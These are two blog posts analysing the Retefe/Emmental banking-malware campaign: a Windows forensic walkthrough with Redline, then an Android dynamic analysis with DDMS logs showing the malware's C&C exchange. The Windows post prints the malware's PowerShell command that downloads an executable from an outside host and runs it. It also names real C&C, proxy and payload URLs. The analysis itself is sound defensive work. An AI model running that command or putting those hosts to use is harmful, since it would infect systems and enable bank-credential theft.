Wednesday, November 18, 2015

Forensic of Retefe malware (windows) with Redline

In the previous post I did the debugging (dynamic analysis) of a fresh APK malware which is part of the Emmental campaign. Also, I mentioned that I got a SMS with the malicious link to the APK, but how did I get that link via a SMS? The answer for this will be in this post. 

Although in my previous posts about Emmental I did not mention it, Emmental is not the only name provided to this this campaign. TrendMicro names it Emmental while other vendors, like PaloAlto, names it Retefe

The campaign is composed of two malware components: once which infects the Windows systems of the victim and the second one which infectes the Android device of the victim. During the first phase of the attack, when the windows system is infected, the bad guys get access to the bank account credentials of the victim, while in the second phase they get 2FA tokens. Also, in phase 1, the victim is invited to put his phone number in order to receive a SMS with the link to the APK (which is supposed to be a legitimate application from the bank). This is basically how to get the link for the APK which I did for previous post.

In previous post I focused the analysis in the Android malware phase, but at this is linked to the Windows infection I'm going to do a bit of analysis on this phase.
For this, I will use the sample 9ed083fa94a1a4d1153f4566309ccd3294bd851b9fa6aff7b6664ef08e1ddda6 which is distributed by email to the victims.
I will use the forensic tool Redline from FireEye.

The full manual of the tool and how to install it is very well explained in the official documentation. For the purpose of this post, and to not repeat the installation process described in the documentation,  I will focus on the analysis of the evidences once are imported in the tool. Obviously, the system has been infected previously with the malware.

Redline interface 

The interface is quite friendly and very intuitive. It is possible to gather all the information about the system, the network, the processed running, the filesystem, registry, memory sections.. and any relevant information from a forensic point of view.




Performing the analysis 

Checking the processes

When performing forensic I always like to do an overview of the processes running and the network connections as first step. With Redline this is very easy to do. Actually, with the 'Hierachical Processes' menu you have straight forward that view. 

One of the interesting things of Redline is that is able to identify suspicious processes and give some additional information about them. In the screenshot below it has identify two suspicious processes and they have been scored with 93 in the MRI (Malware Risk index) (red arrow). Also, another handy thing is that I can 'tag' some of the evidences (green arrow)  which I consider relevant. In this case, there is a powershell command which looks suspicious to me which which I have tagged in red.





If I double click in each of the process I can see the additional information.  For example, for the process marked by Redline as 'Risky' I can see the information around it.


Also, for the other 'PowerShell' process, I can also  see the details of the process:



Arguments: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(New-Object System.Net.WebClient).DownloadFile('http://stars-on-earth.de/neueversion/dtvrtxrcetxrtretec.exe','C:\ProgramData\\Microsoft-KB507196.exe');(New-Object -com Shell.Application).ShellExecute('C:\ProgramData\\Microsoft-KB507196.exe');"

Start time: 2015-11-17 08:42:07Z


Clearly we can see this process is trying to download and EXE file (a dropper, new version of the malware ??) and run it. Also, another interesting evidence is the time when the process was created which can be used as point of reference in the timeline.

Checking the ports

Looking at the ports, I can see all the connections: LISTENING, CLOSED, ESTABLISHED. In this case I am interested in the ESTABLISHED ones and I can see a connection to IP 185.82.216.181 which I label in red.


The IP mentioned below resolves to: tonnelrock.net

Checking the timeline

Looking at the timeline I can see the sequence of events. However, as I already know that some suspicious process timestamp (2015-11-17 08:42:07Z) I can limit the windows frame for the investigation:

I have tagged some evidences I consider relevant. For example, the evidence below, from the LOGS of the system, indicates a Root CA certificate was installed



Going further in the timeline, I also see something suspicious:



There is a change in a REGISTER for the proxy configuration:

https://tonnelrock.net/tonnel.js

This hostname is already familiar to me, from the network connections analysis previously :)

The URL is HTTPS so there is a certificate in the side of the server. Looking at the certificate I see the following:


$ openssl s_client -connect tonnelrock.net:443
CONNECTED(00000003)
depth=0 /C=CH/ST=Zurich/L=Zurich/O=Secure Tonnel/OU=IT/CN=default/emailAddress=me@myhost.mydomain
verify error:num=20:unable to get local issuer certificate
verify return:1
depth=0 /C=CH/ST=Zurich/L=Zurich/O=Secure Tonnel/OU=IT/CN=default/emailAddress=me@myhost.mydomain
verify error:num=27:certificate not trusted
verify return:1
depth=0 /C=CH/ST=Zurich/L=Zurich/O=Secure Tonnel/OU=IT/CN=default/emailAddress=me@myhost.mydomain
verify error:num=21:unable to verify the first certificate
verify return:1
---
Certificate chain
 0 s:/C=CH/ST=Zurich/L=Zurich/O=Secure Tonnel/OU=IT/CN=default/emailAddress=me@myhost.mydomain
   i:/C=US/ST=CA/L=SanFrancisco/O="thawte, Inc."/OU=Certification Services Division/CN=thawte Primary Root CA - G4/emailAddress=
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIHVjCCBT6gAwIBAgICAPQwDQYJKoZIhvcNAQEFBQAwgawxCzAJBgNVBAYTAlVT
....
UKT8c8+pMujMHzcZ0C/D2kwwuz6aFLR2bGby3ODudXekeDq+abB5V6EIviiAy6sm
88+zbeLKTQnecN1m28BkspBAJsp/YEhTtsusDV0mVL42qYNLF4sCxibOvMzTfzCZ
078tuv4HZ41zCNAu9gwis6/oDEfYDx//gCWncfIeix1+yg9zzQgQGtiXfZOVmENZ
S527xNXnRQmryZcIk9c6oQFzDK6fSWKjwcsEeQYjlfaRlB7IPoTQJrLAVDDpqYzN
ifpf7FdMMVnANg==
-----END CERTIFICATE-----
subject=/C=CH/ST=Zurich/L=Zurich/O=Secure Tonnel/OU=IT/CN=default/emailAddress=me@myhost.mydomain
issuer=/C=US/ST=CA/L=SanFrancisco/O="thawte, Inc."/OU=Certification Services Division/CN=thawte Primary Root CA - G4/emailAddress=
---
No client certificate CA names sent
---
SSL handshake has read 2051 bytes and written 712 bytes
---
New, TLSv1/SSLv3, Cipher is AES256-SHA
Server public key is 4096 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1
    Cipher    : AES256-SHA
    Session-ID: 1E76B036BC3963A968D8645440DD08B4BF6512CD539E321D08BF22A2B0237D46
    Session-ID-ctx:
    Master-Key: 235601F367B3F5FD9C1F4E9BE0DC5C19A55D205FF05FD47E1FF93B20AC19A97DF2E46F3AFE697853201D0B50B7C85BC3
    Key-Arg   : None
    Start Time: 1447842834
    Timeout   : 300 (sec)
    Verify return code: 21 (unable to verify the first certificate)


Interesting the CN field in the certificate. This matches the Root CA certificated installed.

Looking further in the timeline, I see there are some interesting URL accesses. This evidences are gathered by Redline from the browser and included in the timeline. Really handy :)









The URL accessed is from a Swiss Bank https://onba.zkb.ch.  However is the URL accessed by the victim the real one or a fake one?. The host onba.zkb.ch resolves to the IP 62.240.192.149, but there is not any connection to that IP in evidences, however there is a connection to the proxy IP (185.82.216.181) as showed previously in the post. This means basically the URL surfed is not going to the real IP directly, hence likely is the the fake portal.

Actually, digging in the logs we can see there are more access to that URL:





If I try to access one of the static resources, like for example https://onba.zkb.ch/image/ch/zkb/slv/onba/resource/common/bank_logo.jpg I can see the resources doesn't exist: 

$ wget https://onba.zkb.ch/image/ch/zkb/slv/onba/resource/common/bank_logo.jpg
--2015-11-18 12:25:15--  https://onba.zkb.ch/image/ch/zkb/slv/onba/resource/common/bank_logo.jpg
Resolving onba.zkb.ch... 62.240.192.149
Connecting to onba.zkb.ch|62.240.192.149|:443... connected.
HTTP request sent, awaiting response... 404 Not Found
2015-11-18 12:25:15 ERROR 404: Not Found.

That basically confirms that the website was a fake one and that was presented to the victim as the real one in order to steal the bank credentials.
Also, this matches the connection detected to the proxy 185.82.216.181

What is the role of the certificate installed? Basically, the certificate installed allows to present the victim a website with a certificate (HTTPS) without any kind of warning, hence the victim doesn't suspect.

How is the SMS sent? once  the user has accessed his bank account, the fake website asks for the phone number in order to send the application(fake) necessary to access the bank.

Summary

Redline is a very useful tool to perform forensic analysis in Windows. it is very easy to setup and the GUI interface is very friendly to use. The timeline is very powerful as it includes all the evidences which makes very easy to follow up the analysis.
Also, it is possible to investigate specific evidences with a simple click. In this case we saw processes, registers, network connection, logs from the browser.

Regarding Emmental / Refete, I checked briefly what the malware does. Once the binary is executed, it install a Root CA Cert and configure a proxy to redirect the traffic to it. This permits to present the user fake bank websites in order to steal the credentials.














Tuesday, November 17, 2015

Android malware (emmental) dynamic Analysis with ddms (Dalvik Debug Monitor)

In this post I will explain an easy way to see what an Android malware is doing while running with a debugger. Android provides the Dalvik Debug Monitor which it is a tool for debugging.

The malware used for this purpose with sha256 212113ea2a71af4aa1229f25b75a064d2cdcfd8ba619c5e316ec5f514a9e8f95 has not yet been reported in VirusTotal by the time of writing this post, but this sample is from the emmental campaign I have talked in previous posts.

The link to the malware was delivered by an SMS so I will try to analyse step by step what happens.

One important requirement to perform debugging is that the APK must be setup as debuggable in the AndroidManifest.xml.

<application android:debuggable="true" android:icon="@drawable/ic_launcher1" android:label="@string/app_name" android:name="org.thoughtcrime.securesms.ApplicationListener" android:theme="@style/TextSecure.LightTheme">

If the APK is not debuggable, it is always possible to manually change the AndroidManifiest.xml to set it up and generated a new APK (for that is is necessary to sign it, but it is out of the scope of this post)

DDMS debugger interface

The debugger is quite simple as seen in the screenshot below. In the top left we can see the device and also the processes which can be debugged. In the bottom right side we see the logs and also we can apply filters






Logs for the SMS application with the malware link


When opening the SMS application (hangouts) logs are generated with this information. In this case there is a link to the APK.

11-17 12:20:47.371: I/Babel(22994): Start loaders for ave{3115675a #0 id=0x7f0c012b bhp}(client_generated:sms:159166478162052737) loader: LoaderManager{35369d8b in ak{30c39e68}}
11-17 12:20:47.626: I/Conv(22994): Conversation loader finished for client_generated:sms:159166478162052737, count# 1

Logs when opening the link

Then, I can click on the link, and I see in the logs that Chrome is opening the URL.

11-17 12:21:07.207: I/ActivityManager(778): START u0 {act=android.intent.action.VIEW dat=http://sicherheitplatz.net/ZKB-Sms-Security-v-15_11.apk cmp=com.android.chrome/com.google.android.apps.chrome.Main (has extras)} from uid 10015 on display 0
11-17 12:21:07.290: I/Conv(22994): Conversation loader finished for client_generated:sms:159166478162052737, count# 1
11-17 12:21:07.390: I/ActivityManager(778): START u0 {act=android.intent.action.VIEW dat=document://648?http://sicherheitplatz.net/ZKB-Sms-Security-v-15_11.apk flg=0x82000 cmp=com.android.chrome/org.chromium.chrome.browser.document.DocumentActivity (has extras)} from uid 10035 on display 0

Also, that the file is successfully downloaded


11-17 12:24:54.089: D/DownloadManager(14796): [221] Finished with status SUCCESS



Logs when the APK is installed and executed for the first time

Next, when clicking in the APK downloaded, I can see the installation process. Also if I run the new application, the logs shows it.
Important to highlight that the calls to the main activity methods are also displayed

11-17 12:27:45.287: I/AppSecurityPermissions(17145): Ignoring unknown permission:org.thoughtcrime.securesms.ACCESS_SECRETS

11-17 12:27:54.150: D/DefContainer(17261): Copying /storage/emulated/0/Download/ZKB-Sms-Security-v-15_11.apk to base.apk
11-17 12:27:54.164: D/OpenGLRenderer(17145): endAllStagingAnimators on 0xb49a0a00 (RippleDrawable) with handle 0xa10a5f20
11-17 12:27:54.653: D/PackageManager(778): Renaming /data/app/vmdl1916226284.tmp to /data/app/org.thoughtcrime.securesms-1
11-17 12:27:54.718: I/PackageManager(778): Running dexopt on: /data/app/org.thoughtcrime.securesms-1/base.apk pkg=org.thoughtcrime.securesms isa=arm vmSafeMode=false
11-17 12:27:54.738: I/dex2oat(24397): /system/bin/dex2oat --zip-fd=6 --zip-location=/data/app/org.thoughtcrime.securesms-1/base.apk --oat-fd=7 --oat-location=/data/dalvik-cache/arm/data@app@org.thoughtcrime.securesms-1@base.apk@classes.dex --instruction-set=arm --instruction-set-features=div --runtime-arg -Xms64m --runtime-arg -Xmx512m --swap-fd=8
11-17 12:27:56.869: W/PackageManager(778): Not granting permission android.permission.BROADCAST_WAP_PUSH to package org.thoughtcrime.securesms (protectionLevel=2 flags=0x8be46)
11-17 12:27:56.919: V/BackupManagerService(778): restoreAtInstall pkg=org.thoughtcrime.securesms token=13 restoreSet=0
11-17 12:27:57.063: D/BackupManagerService(778): Received broadcast Intent { act=android.intent.action.PACKAGE_ADDED dat=package:org.thoughtcrime.securesms flg=0x4000010 (has extras) }
11-17 12:27:57.065: W/BackupManagerService(778): Removing schedule queue dupe of org.thoughtcrime.securesms
11-17 12:27:57.147: D/PackageBroadcastService(1614): Received broadcast action=android.intent.action.PACKAGE_ADDED and uri=org.thoughtcrime.securesms
11-17 12:27:57.167: D/h(1614): Processing package: org.thoughtcrime.securesms
11-17 12:27:57.170: D/GassUtils(1614): Found app info for package org.thoughtcrime.securesms:10. Hash: 98d4c17a13e7994e688ce160692c9de8bdc8d7837adf398d5a6e393e336fe14d
11-17 12:27:57.170: D/h(1614): Found info for package org.thoughtcrime.securesms in db.
11-17 12:27:57.633: I/UpdateIcingCorporaServi(10708): Updating corpora: APPS=org.thoughtcrime.securesms, CONTACTS=MAYBE
11-17 12:30:23.991: I/ActivityManager(778): START u0 {act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10000000 pkg=org.thoughtcrime.securesms cmp=org.thoughtcrime.securesms/.RoutingActivity} from uid 10063 on display 0
11-17 12:30:23.998: V/WindowManager(778): addAppToken: AppWindowToken{39c71651 token=Token{3808cf78 ActivityRecord{2c1ca8db u0 org.thoughtcrime.securesms/.RoutingActivity t90}}} to stack=1 task=90 at 0
11-17 12:30:24.005: V/WindowManager(778): Adding window Window{3452b042 u0 Starting org.thoughtcrime.securesms} at 6 of 12 (after Window{329ce254 u0 com.android.packageinstaller/com.android.packageinstaller.InstallAppProgress})
11-17 12:30:24.035: I/ActivityManager(778): Start proc 24690:org.thoughtcrime.securesms/u0a117 for activity org.thoughtcrime.securesms/.RoutingActivity
11-17 12:30:24.224: W/ContextImpl(24690): Implicit intents with startService are not safe: Intent { act=XMainProcessStart (has extras) } android.content.ContextWrapper.startService:516 org.thoughtcrime.securesms.RoutingActivity.onCreate:-1 android.app.Activity.performCreate:5990 
11-17 12:30:24.264: V/WindowManager(778): Adding window Window{2a41199f u0 org.thoughtcrime.securesms/org.thoughtcrime.securesms.RoutingActivity} at 6 of 13 (before Window{3452b042 u0 Starting org.thoughtcrime.securesms})
11-17 12:30:24.348: I/ActivityManager(778): START u0 {cmp=org.thoughtcrime.securesms/.FirstActivity (has extras)} from uid 10117 on display 0
11-17 12:30:24.350: V/WindowManager(778): addAppToken: AppWindowToken{187f094a token=Token{6973eb5 ActivityRecord{3808aec u0 org.thoughtcrime.securesms/.FirstActivity t90}}} to stack=1 task=90 at 1
11-17 12:30:24.350: V/WindowManager(778): Adding window Window{3452b042 u0 Starting org.thoughtcrime.securesms} at 7 of 13 (after Window{2a41199f u0 org.thoughtcrime.securesms/org.thoughtcrime.securesms.RoutingActivity})
11-17 12:30:24.448: V/WindowManager(778): Adding window Window{cca1131 u0 org.thoughtcrime.securesms/org.thoughtcrime.securesms.FirstActivity} at 7 of 14 (before Window{3452b042 u0 Starting org.thoughtcrime.securesms})
11-17 12:30:24.678: I/ActivityManager(778): Displayed org.thoughtcrime.securesms/.FirstActivity: +281ms (total +664ms)
11-17 12:30:29.349: I/ActivityManager(778): Start proc 24738:org.thoughtcrime.securesms:remote/u0a117 for broadcast org.thoughtcrime.securesms/.xservices.XUpdate
11-17 12:30:29.410: I/ActivityManager(778): START u0 {flg=0x10020000 cmp=org.thoughtcrime.securesms/.xpack.ActDefault} from uid 10117 on display 0
11-17 12:30:29.416: V/WindowManager(778): addAppToken: AppWindowToken{3c579bf0 token=Token{79d7c33 ActivityRecord{397777a2 u0 org.thoughtcrime.securesms/.xpack.ActDefault t90}}} to stack=1 task=90 at 1
11-17 12:30:29.444: V/WindowManager(778): Adding window Window{15796bee u0 org.thoughtcrime.securesms/org.thoughtcrime.securesms.xpack.ActDefault} at 6 of 12 (after Window{cca1131 u0 org.thoughtcrime.securesms/org.thoughtcrime.securesms.FirstActivity})
11-17 12:30:29.510: I/ActivityManager(778): Displayed org.thoughtcrime.securesms/.xpack.ActDefault: +90ms


Logs while the malware is communicating with the C&C

In the screenshot below there are some of the logs generated by the malicious APK. In any, case I am going to describe a bit about the process (in green)




11-17 12:30:24.222: D/[SmsSecure]:myFunctions:sendLog(24690): [START] Service started  -> The service is started

11-17 12:30:24.223: D/[SmsSecure]:myFunction.isHasBuffer(24690): use_url_main=''
11-17 12:30:24.223: D/[SmsSecure]:myFunction.isHasBuffer(24690): use_url_main.length()='0'
11-17 12:30:29.397: D/[SmsSecure]:XUpdate(24738): Update
11-17 12:30:29.408: D/[SmsSecure]:XUpdate(24738): Need Default APP
11-17 12:30:29.441: D/[SmsSecure]:SERVICE:XRepeatSms(24738): Timed alarm onReceive() started at time: 2015-11-17 12:30:29.439
11-17 12:30:29.451: D/[SmsSecure]:SERVICE:XRepeatSms(24738): doInBackground
11-17 12:30:29.454: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main=''
11-17 12:30:29.454: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main.length()='0'
11-17 12:30:29.454: D/[SmsSecure]:SERVICE:XRepeatSms(24738): !isHasBuffer={true}
11-17 12:30:29.455: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main=''
11-17 12:30:29.455: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main.length()='0'
11-17 12:30:29.455: D/[SmsSecure]:SERVICE:XRepeatSms(24738): myFunctions.getFirst()
11-17 12:30:29.457: D/[SmsSecure]:myFunctions:getFirst(24738): RID=0
11-17 12:30:29.457: D/[SmsSecure]:myFunctions:getFirst(24738): RID=0; Start -> Method in charge of getting the initial configuration. This is an XML file


11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738): <?xml version="1.0" encoding="utf-8"?> -> Method to parse the XML file
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):           <config>
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):             <data rid="25" 
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):                   shnum10="" shtext10="" shnum5="" shtext5="" shnum3="" shtext3="" shnum1="" shtext1="" 
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):                   del_dev="0" 
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):                   url_main="http://www.mgattiswil.ch/stadl/main.php;http://www.ableitner.co.at/manufaktur/main.php" -> The C&C URLs stored in the field url_main (there are 2)
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):                   url_data="" 
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):                   url_sms="" 
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):                   url_log="" 
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):                   phone_number="" 
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):   
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):  download_domain="ttt" 
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):                   ready_to_bind="0" />
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):             
11-17 12:30:29.470: D/[SmsSecure]:myFunctions:parseXml(24738):           </config>
11-17 12:30:29.498: D/[SmsSecure]:myFunctions:parseXml(24738): RTB=0
> File finally parsed
11-17 12:30:29.514: D/[SmsSecure]:myFunctions:getFirst(24738): RID=25
11-17 12:30:29.514: D/[SmsSecure]:myFunctions:getFirst(24738): use_url_main=http://www.mgattiswil.ch/stadl/main.php -> The C&C selected (the first one selected from the existing 2)
11-17 12:30:29.514: D/[SmsSecure]:myFunctions:getFirst(24738): Key not found -> Some Key is not found. 
11-17 12:30:29.514: D/[SmsSecure]:Gate:getKey(24738): Start
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): sInput=a:4: {s:6:"device";s:738:  -> Send a request to the C&C "QXBwTmFtZT1aS0IgU21zU2VjdXJpdHk7ClZlcnNpb249My4xMDsKOwpEZWZhdWx0QXBwPU5vOwpB
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738)-> This is the information from the device sent in the request
 ZG1pbj1ObzsKU2ltU3RhdGU9UkVBRFk7ClNpbUNvdW50cnlDb2RlPWNoOwpTaW1PcGVyYXRvckNv
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): ZGU9MjI4NTQ7ClNpbU9wZXJhdG9yTmFtZT1MeWNhbW9iaWxlOwpTaW1TZXJpYWxOdW1iZXI9ODk0
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): MTU0MDAxMDAyODU4MDgyMDsKUGhvbmVOdW1iZXI9OwpEZXZpY2VJTUVJPTM1ODI0MDA1MTkzMjU2

11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): bGU7CkZJTkdFUlBSSU5UPWdvb2dsZS9oYW1tZXJoZWFkL2hhbW1lcmhlYWQ6NS4xLjEvTE1ZNDhJ
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): LzIwNzQ4NTU6dXNlci9yZWxlYXNlLWtleXM7Ck1BTlVGQUNUVVJFUj1MR0U7Ck1PREVMPU5leHVz
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): IDU7ClBST0RVQ1Q9aGFtbWVyaGVhZDsKT1NfSW5mbz1vcy5uYW1lOiBMaW51eCB8IG9zLmFyY2g6
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): IGFybXY3bCB8IG9zLnZlcnNpb246IDMuNC4wLWdiZWJiMzZiIHwgamF2YS52ZW5kb3I6IFRoZSBB
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): bmRyb2lkIFByb2plY3QgfCBqYXZhLnZlcnNpb246IDA=
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): 
";s:3:"cmd";s:7:"get_key";s:3:"rid";s:2:"25";s:4:"data";s:0:"";} -> Final C&C commands. Note the get_key command
11-17 12:30:29.543: D/[SmsSecure]:Gate:sendRequest(24738): Using crypt: Blowfish -> The information is encrypted with BlowFish
11-17 12:30:29.545: D/[SmsSecure]:Gate:getKey(24738): Key:
11-17 12:30:29.545: D/[SmsSecure]:SERVICE:XRepeatSms(24738): myFunctions.sendSmsLog("Online=OK")
11-17 12:30:29.545: D/[SmsSecure]:myFunctions:sendSmsLog(24738): Start
11-17 12:30:29.551: D/[SmsSecure]:myFunctions:sendSmsLog(24738): sNumber = ''
11-17 12:31:29.297: D/[SmsSecure]:XUpdate(24738): Update
11-17 12:31:29.321: D/[SmsSecure]:XUpdate(24738): Need Default APP
11-17 12:31:29.340: D/[SmsSecure]:myFunctions:getCheckedURL(24738): Check url: http://www.mgattiswil.ch/stadl/main.php -> Checking if the C&C is  up and running
11-17 12:31:30.044: D/[SmsSecure]:myFunctions:getCheckedURL(24738): resp=<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>404 - File Not Found</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><style type="text/css"><!--.style { width: 500px; border: 1px solid #ddd;}.style1 { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 24px; color: #D70000; font-weight: bold;}.style2 { color: #FFFFFF; font-weight: bold; font-family: Verdana, Arial, Helvetica, sans-serif;}--></style></head><body><table border="0" align="center" class="style">  <tr>    <td width="304" bgcolor="#D70000"> <span class="style2">404 - File Not Found </span></td>  </tr>  <tr>    <td height="188"><div align="center"><span class="style1">Fichier non trouv&eacute;</span></div>    <div align="center"><span class="style1">Datei nicht gefunden</span></div>    <div align="center"><span class="style1">File not found</span></div></td>  </tr></table></body></html> -> HTML sent by the C&C. 

11-17 12:31:30.045: D/[SmsSecure]:myFunctions:getCheckedURL(24738): Check url: http://www.ableitner.co.at/manufaktur/main.php -> Checking if the second C&C is  up and running 

11-17 12:31:31.827: D/[SmsSecure]:myFunctions:getCheckedURL(24738): resp=OK -> The response is OK. This is what the malware was expecting
11-17 12:31:31.828: D/[SmsSecure]:myFunctions:getCheckedURL(24738): SET use_url_main=http://www.ableitner.co.at/manufaktur/main.php > The default C&C URL is changed to the working one
11-17 12:31:31.859: D/[SmsSecure]:myFunctions:sendLog(24738): [CONF] Check pull off urls
11-17 12:31:31.859: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main='http://www.ableitner.co.at/manufaktur/main.php'
11-17 12:31:31.860: D/[SmsSecure]:myFunction.isHasBuffer(24738): use_url_main.length()='46'
11-17 12:31:31.861: D/[SmsSecure]:myFunctions:getFirst(24738): RID=25
11-17 12:31:31.861: D/[SmsSecure]:myFunctions:getFirst(24738): RID=0; Start
11-17 12:31:31.881: D/[SmsSecure]:myFunctions:getFirst(24738): RID=25
11-17 12:31:31.882: D/[SmsSecure]:myFunctions:getFirst(24738): use_url_main=http://www.ableitner.co.at/manufaktur/main.php
11-17 12:31:31.882: D/[SmsSecure]:myFunctions:getFirst(24738): Key not found -> 
11-17 12:31:31.882: D/[SmsSecure]:Gate:getKey(24738): Start
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): sInput=a:4:{s:6:"device";s:738:"QXBwTmFtZT1aS0IgU21zU2VjdXJpdHk7ClZlcnNpb249My4xMDsKOwpEZWZhdWx0QXBwPU5vOwpB -> The process is repeated for the new C&C 
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): ZG1pbj1ObzsKU2ltU3RhdGU9UkVBRFk7ClNpbUNvdW50cnlDb2RlPWNoOwpTaW1PcGVyYXRvckNv
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): ZGU9MjI4NTQ7ClNpbU9wZXJhdG9yTmFtZT1MeWNhbW9iaWxlOwpTaW1TZXJpYWxOdW1iZXI9ODk0
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): MTU0MDAxMDAyODU4MDgyMDsKUGhvbmVOdW1iZXI9OwpEZXZpY2VJTUVJPTM1ODI0MDA1MTkzMjU2

11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): LzIwNzQ4NTU6dXNlci9yZWxlYXNlLWtleXM7Ck1BTlVGQUNUVVJFUj1MR0U7Ck1PREVMPU5leHVz
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): IDU7ClBST0RVQ1Q9aGFtbWVyaGVhZDsKT1NfSW5mbz1vcy5uYW1lOiBMaW51eCB8IG9zLmFyY2g6
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): IGFybXY3bCB8IG9zLnZlcnNpb246IDMuNC4wLWdiZWJiMzZiIHwgamF2YS52ZW5kb3I6IFRoZSBB
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): bmRyb2lkIFByb2plY3QgfCBqYXZhLnZlcnNpb246IDA=
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): ";s:3:"cmd";s:7:"get_key";s:3:"rid";s:2:"25";s:4:"data";s:0:"";}
11-17 12:31:31.920: D/[SmsSecure]:Gate:sendRequest(24738): Using crypt: Blowfish
11-17 12:31:32.421: D/[SmsSecure]:Gate:sendRequest(24738): Response=3jfwJedaPDVEM5Lu89n7AFAslgKs6gAXh82zEgzgKYLMVXMOM+6msSlhg6q3WkTTPJLSv1vTf/czBakmUb+NvNMqvy4vHdFO1+FJFIBBTs82rPILwvUrIH02bZ/7DuO7lf1jCvs53mLbnD99cVv3r741SpR3WYdbg8vuT8TYM6/SX7BUPgyDvrHb7V2VZEJxABu984monif4RbhBQO9ZeTvDUAlRCHhacqyQYkO0i/0S1dxLYkKYQadIee4yBf3YCPNRF2FGKXZwG6E5N/dcMbRnGlDXSrFxZvKr6rEAefzngAwCRgcIhubVHZKo3aMfyXlhXkbRlIiyeVst0G0qgWbkD9yVtKUgXEwXV3gFoXEbfZkPkRbcnNCyV8McDL88rhW23qqeZW4Lq2NAGpybJWt4kY3FHza/8p6Wif52NC51t68YktvAW7BEgXBj7T/fGDXQjWAigjxCj1Chq9uzDxKEnbo+GY9h4ro8NEXy4uVQNxgU6hW3Ai1aEC/qYqHKZIpEp7KkL6CDfKAgqWTBQc9WSuIL6A8Ai4ksQAG2btfHxDvwkhEfQDRE/wFrABmYsJ1ln+VIWyRgvM3BX9V4I65Pn1C9NrVIQKVCC7ohMWmbwC2sAaNUgnR7lGty4R0jpwVQduTXrdIfNAlLOw1kl6LLDgXjfbQrkpJpnXnmFKWWfe4ir6fcArao2fFFKL11TrDoWG9KSLdRwGcnlj0vFvaasCARquwdaZHXnoXs3BQhEUfuvx8+xKhu125MM/9U0TAYLKE8cWz9QXsQEm+o00uXUjJ1vB+9sgbGF6TEpqQkRhghGvCB/DO6sw7AjJXF/QTQjZpzd3NRyKy0/ulXn0XVxuXEPQFOJ4JwYiiULPmH9mZE5xfwyzzVjXvzXpXSDX90c9akxItBkLADkjeixEatNo9Wl0gK7h5GScCzRMCJmzGXg4DAAA1SX1DgPPnFRmu9IKPIbwPz+xB6zjgMQNJdVxqKo9hYnObBk0Os89gQxlHvB1WoqwQ4q9Evb8nWE87eUDnXVQTX0sqL2myI8eBNPPogv8Fqm+WYWGMQAFmhwoVY9rjNRg== -> This is the response from the server.
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): Response=-----BEGIN PUBLIC KEY------> The response contains  a public key. 
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA2ukQOm/tVXksvZwnbHgr
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): ZwbqyMl0A6QKobSfpku1qI15/p73bXl2K/loHcohfpnXBLpbka0uUBjU2qWiYkKb
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): 1zzgruzShUFUEeExkWck1Qz5dz4/i0uBlJ3z57LV/EnW8+sXsUEDp5AbKQ79Agxe
11-17 12:31:32.425: D/[SmsSecure]:Gate:sendRequest(24738): YAdLzs+UITAX5NIOmM+ktX79N/E9osBCcFfrVXDTt658EUvVSGGdoWF/Ey3x0LwX
